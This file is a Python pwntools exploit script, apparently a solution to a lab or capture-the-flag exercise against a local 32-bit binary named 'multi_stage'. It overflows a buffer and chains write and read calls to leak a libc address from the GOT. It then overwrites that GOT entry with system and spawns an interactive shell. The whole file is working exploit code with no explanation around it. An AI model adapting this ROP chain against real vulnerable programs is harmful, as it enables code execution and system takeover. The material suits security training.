#!/usr/bin/python

from pwn import *



def main():
    # start a process
    p = process("./multi_stage")

    write_plt = 0x08048320
    write_got = 0x804a014
    read_plt = 0x8048300
    read_got = 0x804a00c
    ed_string = 0x8049243

    pop_pop_pop_ret = 0x080484e9
    # create payload
    # Please put your payload here
    payload = b"A" * 28
    payload += p32(write_plt)
    payload += p32(pop_pop_pop_ret)
    payload += p32(1)
    payload += p32(write_got)
    payload += p32(4)
    payload += p32(read_plt)
    payload += p32(pop_pop_pop_ret)
    payload += p32(0)
    payload += p32(write_got)
    payload += p32(4)
    payload += p32(write_plt) # aka system_libc
    payload += p32(0xdeadbeef)
    payload += p32(ed_string)


    # send the payload to the binary
    p.send(payload)

    data = p.recv()
    log.info("Data captured: %s", data)
    data = data[16:]
    log.info("Data trimed as : %s", data)
    write_libc = u32(data)
    log.info("write_libc: 0x%x", write_libc)
    libc = ELF("/lib/i386-linux-gnu/libc.so.6")

    offset_write = libc.symbols['write']
    offset_system = libc.symbols['system']

    libc_base = write_libc - offset_write
    system_libc = libc_base + offset_system
    log.info("system_libc: 0x%x", system_libc)

    p.send(p32(system_libc))

    # pass interaction bac to the user
    p.interactive()

if __name__ == "__main__":
    main()